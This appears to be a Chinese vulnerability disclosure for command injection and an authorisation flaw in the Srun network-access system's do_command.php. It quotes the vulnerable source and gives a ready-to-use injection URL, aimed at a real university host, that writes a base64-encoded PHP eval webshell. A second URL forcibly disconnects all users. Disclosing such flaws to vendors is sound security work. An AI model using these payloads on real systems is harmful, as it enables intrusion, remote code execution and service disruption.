### 简要描述:
深澜一处命令执行 越权 之前没实例不给通过现在附一个 河北某大学的
### 详细说明:
先看源码,简单粗暴命令执行,但是没给审核,于是就有了后文
```
switch ( $_GET['action'] )
{
case "drop_user" :
if ( $_GET['ipv'] == "ipv4" )
{
if ( $_GET['uname1'] == "-all" )
{
$pfd = popen( "/srun3/bin/online_user -4 -d ".$_GET['uname1'], "r" ); //命令执行
}
else
{
$pfd = popen( "/srun3/bin/online_user -4 -D ".$_GET['uname1'], "r" );
udp_send( $_GET['ip'], 10333, "0&您已被强制断线" );
}
} }
}
```
### 漏洞证明:
实例中srun3000部署在内网。于是通过dmz一台主机代理访问测试。
根据源码
http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=1|echo "<?php file_put_contents(base64_decode(L3NydW4zL3dlYi9taWMucGhw'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydtaWMnXSk7Pz4='));?>">/srun3/web/1.php 写上去1.php 访问生成mic.php 密码mic (已删除)
[<img src="https://images.seebug.org/upload/201405/2511590699de98602a4a71e846677b49d021d902.png" alt="web.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2511590699de98602a4a71e846677b49d021d902.png)
还有越权 可以踢掉所有人。
http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=-all
[<img src="https://images.seebug.org/upload/201405/25120209ca52ac8d0a72f7989b2302d9ffcdea6a.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25120209ca52ac8d0a72f7989b2302d9ffcdea6a.png)
影响数据
[<img src="https://images.seebug.org/upload/201405/251202422e6ff5c6f3255e3059b91de18daffa48.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251202422e6ff5c6f3255e3059b91de18daffa48.png)
ps:这句话一会可以删掉:后面还有几个命令执行的地方每个都需要这样写实例吗?麻烦狗哥了。
注:经测试
action=drop_user1、action=dm_drop_user&sid=、action=rad_drop_user&uname1=、action=rad_drop_user1&uname1=、action=disable_user&uname1=
等 都存在命令执行漏洞 请官方自查
京公网安备 11010502034610号
暂无评论